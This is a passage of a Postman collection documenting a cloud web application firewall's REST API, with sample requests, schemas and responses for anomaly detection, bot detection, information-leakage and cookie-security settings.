{{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","machinelearning"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"status\": \"enable\",\n        \"sample_collection_time\": 1,\n        \"ip_list_type\": \"Trust\",\n        \"source_ip_list\": [{\n            \"ip\": \"172.22.1.8-172.22.1.45\"\n        }],\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"12980701-1f09-48c4-8f43-265e7150bc6c"},{"name":"Update Anomaly Detection","id":"e8c0cb52-83c7-4727-850d-91ea3d9c0f7e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"status\": \"enable\",\n    \"ip_list_type\": \"Trust\",\n    \"action\": \"alert_deny\",\n    \"ip_list\": [{\n        \"ip\": \"172.22.1.8-172.22.1.45\"\n    }],\n    \"template_status\": \"disable\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","description":"<p>Modify the configuration of anomaly detection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"status\": {\n            \"description\": \"Enable/Disable anomaly detection for current application.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"sample_collection_time\": {\n            \"description\": \"The period to build an anomaly detection model by collecting samples, counting by weeks.\",\n            \"type\": \"integer\",\n            \"minimum\": 1,\n            \"maximum\": 10000\n        },\n        \"ip_list_type\": {\n            \"description\": \"Define whether to restrict learning or to not learn from certain IP/Range.\",\n            \"type\": \"string\",\n            \"enum\": [\"Trust\", \"Block\"]\n        }, \n        \"action\": {\n            \"description\": \"Define which action would be taken when the anomaly is detected.\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\", \"alert_deny\"]\n        },\n        \"source_ip_list\": \n            {\n                \"ip\": {\n                    \"description\":\"The IPv4/IPv6 address in Trust/Block list, IP range with '-'. is supported\",\n                    \"type\": \"string\"\n                }\n            },\n\n        \n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","machinelearning"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2ae1f226-9309-4c71-876e-f13eade1f3aa","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"status\": \"enable\",\n    \"sample_collection_time\": 1,\n    \"ip_list_type\": \"Trust\",\n    \"source_ip_list\": [{\n        \"ip\": \"172.22.1.8-172.22.1.45\"\n    }]\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","machinelearning"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"},{"id":"5553734f-2f27-40e1-a3b9-743e11ee351f","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"status\": \"enable\",\n    \"sample_collection_time\": 1,\n    \"ip_list_type\": \"Trust\",\n    \"action\": \"alert_deny\",\n    \"source_ip_list\": [{\n        \"ip\": \"172.22.1.8-172.22.1.45\"\n    }]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/machinelearning","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","machinelearning"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"014e6d2d-86aa-11e9-ab5c-5f37fc59c03b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"av2rPHRpoAMF4Xg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"e8c0cb52-83c7-4727-850d-91ea3d9c0f7e"},{"name":"GET Machine Learning Bot Detection","id":"95e14b6a-c142-412b-93e4-0caa0ed3b949","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mlbotdetection"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"57f98222-ac3b-4ba8-a8e3-90c245ad6402","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"any","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"9fbaa4dc-391b-4896-a921-4ee060ccac71","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","mlbotdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"detection_status\": \"disable\",\n        \"identification_method\": \"IP\",\n        \"model_type\": \"Strict\",\n        \"detection_setting\": {\n            \"anomaly_setting\": 3,\n            \"challenge\": \"Real-Browser-Enforement\",\n            \"action\": \"block-period\",\n            \"block_duration\": 600\n        },\n        \"source_ip\": [],\n        \"exception_urls\": []\n    }\n}"},{"id":"fb117340-af26-4f47-b362-42a21d40946b","name":"Fail","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","mlbotdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"code":400,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": {{exception message}}\r\n}"}],"_postman_id":"95e14b6a-c142-412b-93e4-0caa0ed3b949"},{"name":"Update Machine Learning Bot Detection","id":"59e88ef7-5ef4-48cb-b31e-16fcb4346d11","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\r\n  \"detection_status\": \"enable\",\r\n  \"identification_method\": \"IP\",\r\n  \"model_type\": \"Strict\",\r\n  \"detection_setting\": {\r\n    \"anomaly_setting\": 3,\r\n    \"challenge\": \"Disable\",\r\n    \"action\": \"alert\",\r\n    \"block_duration\": 0\r\n  },\r\n  \"source_ip\": [],\r\n  \"exception_urls\": [],\r\n  \"template_status\": \"disable\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","urlObject":{"protocol":"https","path":["v1","application",":ep_id","mlbotdetection"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"1829bd37-acbd-4866-b2c3-4699f6a2eff0","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"any","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"56edf771-a893-4f1a-ac03-64e4f47d22f9","name":"Success","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\r\n  \"detection_status\": \"enable\",\r\n  \"identification_method\": \"IP\",\r\n  \"model_type\": \"Strict\",\r\n  \"detection_setting\": {\r\n    \"anomaly_setting\": 3,\r\n    \"challenge\": \"Disable\",\r\n    \"action\": \"alert\",\r\n    \"block_duration\": 0\r\n  },\r\n  \"source_ip\": [],\r\n  \"exception_urls\": [],\r\n  \"template_status\": \"disable\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","mlbotdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"856c9f21-8ce7-4857-9884-5e71876b36b8","name":"Fail","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\r\n  \"detection_status\": \"enable\",\r\n  \"identification_method\": \"IP\",\r\n  \"model_type\": \"Strict\",\r\n  \"detection_setting\": {\r\n    \"anomaly_setting\": 3,\r\n    \"challenge\": \"Disable\",\r\n    \"action\": \"alert\",\r\n    \"block_duration\": 0\r\n  },\r\n  \"source_ip\": [],\r\n  \"exception_urls\": [],\r\n  \"template_status\": \"disable\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/mlbotdetection","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","mlbotdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": {{exception message}}\r\n}"}],"_postman_id":"59e88ef7-5ef4-48cb-b31e-16fcb4346d11"},{"name":"Get Information Leakage","id":"1fdabb5a-051b-4d31-a6bf-95f8a79cc752","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","description":"<p>Get the configuration information of information leakage.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","informationleakage"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"5c348ee6-6eb6-43f0-b5ef-0a473c8823de","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","informationleakage"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 02:13:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"303"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e59456ff-7aa4-11e9-9b61-319417718b38"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z9cGAHXiIAMF46g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce20d59-8f517a560941960ac231993c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"erase http headers\": \"enable\",\n        \"exception rule\": [],\n        \"information leakage\": \"enable\",\n        \"erase http headers rule\": [],\n        \"cloak error page\": \"enable\",\n        \"server information disclosure\": \"enable\",\n        \"action\": \"deny_erase_no_log\",\n        \"template_status\": \"disable\"\n    }\n}"},{"id":"87def867-c9b5-4857-9678-20cda9722a62","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","informationleakage"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 02:12:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"b31d7cec-7aa4-11e9-9474-efb5e447db87"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z9b4xEf4IAMF5nQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"1fdabb5a-051b-4d31-a6bf-95f8a79cc752"},{"name":"Update Information Leakage","id":"aa7b714b-a2c4-4532-ab7b-ecb6972cb834","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"information leakage\": \"enable\",\n    \"server information disclosure\": \"enable\",\n    \"cloak error page\": \"enable\",\n    \"erase http headers\": \"enable\",\n    \"action\": \"deny_erase_no_log\",\n    \"erase http headers rule\": [\n        {\"expression\": \"http-header-1\"} ,\n        {\"expression\": \"http-header-2\"}   \n    ],\t\n    \"exception rule\": [\n       {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature_id\": \"080010001\",\n          \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"cookie\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n       },\n       {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature_id\": \"080010002\",\n          \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"cookie\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n       }\n    ]\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","description":"<p>Update the configuration information of information leakage. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"information leakage\", \"action\"],\n    \"properties\": {\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"information leakage\": {\n            \"description\": \"Configure to enable or disable information leakage\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"server information disclosure\": {\n            \"description\": \"Configure to detect and erase server specific sensitive information in headers and response page, with no alerts generated\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"action\": {\n            \"description\": \"Select the action that TIM Host Protection takes when it detects a violation of the rule.\",\n            \"type\": \"string\",\n            \"enum\": [\"alert\", \"alert_deny\", \"deny_erase_no_log\"],\n            \"default\": \"deny_erase_no_log\"\n        },\n        \"cloak error page\": {\n            \"description\": \"Configure to replace 403, 404, and 5XX with 500 error code\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \"erase http headers\": {\n            \"description\": \"Configure to cloak server replied HTTP headers\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"enable\"\n        },\n        \n        \"erase http headers rule\": {\n            \"description\": \"Specify the HTTP header\",\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"properties\": {\n                    \"expression\": {\n                        \"type\": \"string\"\n                    }\n                }\n            }\n        },\n        \"exception rule\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"signature_name\", \"signature_id\"],\n                \"properties\": {\n                    \"signature_name\": {\n                        \"description\": \"The signature name\",\n                        \"type\": \"string\"\n                    },\n                    \"signature_id\": {\n                        \"description\": \"The signature ID\",\n                        \"type\": \"string\",\n                        \"maxLength\": 9,\n                        \"minLength\": 9\n                    },\n                    \"url\": {\n                        \"type\": \"object\",\n                        \"required\": [\"value\"],\n                        \"properties\": {\n                            \"operator\": {\n                                \"description\": \"Select STRING_MATCH to match the URL of requests with a literal URL or select REGEXP_MATCH to match the URL of requests with a regular epression\",\n                                \"type\": \"string\",\n                                \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                                \"default\": \"STRING_MATCH\"\n                            },\n                            \"value\": {\n                                \"description\": \"The value for Request URL\",\n                                \"type\": \"string\",\n                                \"maxLength\": 255,\n                                \"pattern\": \"/.*\"\n                            },\n                            \"status\": {\n                                \"description\": \"Configure to enable or disable Request URL\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"enable\"\n                            }\n                        }\n                    },\n                    \"parameter\": {\n                        \"type\": \"object\",\n                        \"required\": [\"value\"],\n                        \"properties\": {\n                            \"operator\": {\n                                \"description\": \"Select STRING_MATCH to match the parameter name with a literal URL or select REGEXP_MATCH to match the parameter name with a regular epression\",\n                                \"type\": \"string\",\n                                \"enum\": [\"REGEXP_MATCH\", \"STRING_MATCH\"],\n                                \"default\": \"STRING_MATCH\"\n                            },\n                            \"value\": {\n                                \"description\": \"The parameter name\",\n                                \"type\": \"string\"\n                            },\n                            \"status\": {\n                                \"description\": \"Configure to enable or disable parameter name\",\n                                \"type\": \"string\",\n                                \"enum\": [\"enable\", \"disable\"],\n                                \"default\": \"disable\"\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","informationleakage"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4c3ae388-cda4-4de0-aee3-98d3ac6cc2c6","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"information leakage\": \"enable\",\n    \"server information disclosure\": \"enable\",\n    \"personally identifiable information\": \"enable\",\n    \"cloak error page\": \"enable\",\t\n    \"erase http headers\": \"enable\",   \n    \"action\": \"deny_erase_no_log\",\n    \"erase http headers rule\": [\n        {\"expression\": \"http-header-1\"} ,\n        {\"expression\": \"http-header-2\"}   \n    ],\t\n    \"exception rule\": [\n       {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature\": \"080010001\",\n          \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n       },\n       {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature_id\": \"080010002\",\n          \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n       }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","informationleakage"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 02:59:59 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"5add9cab-7aab-11e9-becf-3d20fb762f88"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z9i3ZE-eoAMFuJA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce2182f-49ca0828ab1a05acfdb815b8;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'signature_id': 'The signature_id is not blank!'}\"\n}"},{"id":"72552113-a80d-4b0a-ae82-aed0363da871","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"information leakage\": \"enable\",\n    \"server information disclosure\": \"enable\",\n    \"personally identifiable information\": \"enable\",\n    \"cloak error page\": \"enable\",\n    \"erase http headers\": \"enable\",\n    \"action\": \"deny_erase_no_log\",\n    \"erase http headers rule\": [\n        {\"expression\": \"http-header-1\"} ,\n        {\"expression\": \"http-header-2\"}   \n    ],\n    \"exception rule\": [\n      {\n        \"signature_name\": \"Information Disclosure\",\n        \"signature_id1\": \"080010001\",\n        \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      },\n      {\n        \"signature_name\": \"Information Disclosure\",\n        \"signature_id\": \"080010002\",\n        \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n        \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n      }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","informationleakage"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:00:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"73602d8a-7aab-11e9-8da6-adcc60081315"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z9i91FAXIAMFraQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"b7ee6178-c634-411f-ae8c-78804f70a2d3","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"information leakage\": \"enable\",\n    \"server information disclosure\": \"enable\",\n    \"personally identifiable information\": \"enable\",\n    \"cloak error page\": \"enable\",\n    \"erase http headers\": \"enable\",\n    \"action\": \"deny_erase_no_log\",\n    \"erase http headers rule\": [\n        {\"expression\": \"http-header-1\"} ,\n        {\"expression\": \"http-header-2\"}   \n    ],\n    \"exception rule\": [\n        {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature_id\": \"080010001\",\n          \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        },\n        {\n          \"signature_name\": \"Information Disclosure\",\n          \"signature_id\": \"080010002\",\n          \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n          \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/informationleakage","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","informationleakage"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 Jul 2019 03:46:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"594"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"027fd32b-9c7c-11e9-9701-190b2ea8e387"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"cLYBrGkDoAMF3vw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d1ad3a4-0c37bf387d7559ee8248eb42;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"information leakage\": \"enable\",\n    \"server information disclosure\": \"enable\",\n    \"cloak error page\": \"enable\",\n    \"erase http headers\": \"enable\",\n    \"action\": \"deny_erase_no_log\",\n    \"erase http headers rule\": [\n        {\n            \"expression\": \"http-header-1\"\n        },\n        {\n            \"expression\": \"http-header-2\"\n        }\n    ],\n    \"exception rule\": [\n        {\n            \"signature_name\": \"Information Disclosure\",\n            \"signature_id\": \"080010001\",\n            \"url\": {\"value\": \"/test\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        },\n        {\n            \"signature_name\": \"Information Disclosure\",\n            \"signature_id\": \"080010002\",\n            \"url\": {\"value\": \"/abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ]\n}"}],"_postman_id":"aa7b714b-a2c4-4532-ab7b-ecb6972cb834"},{"name":"Get Cookie Security","id":"3b00e3d8-94ec-454a-b2a3-41051d9b5222","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","description":"<p>Get the information of the cookie security configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","cookiesecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"75cc8421-9505-4d05-a022-82e686003420","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CookieSecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CookieSecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The end point id."}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:07:21 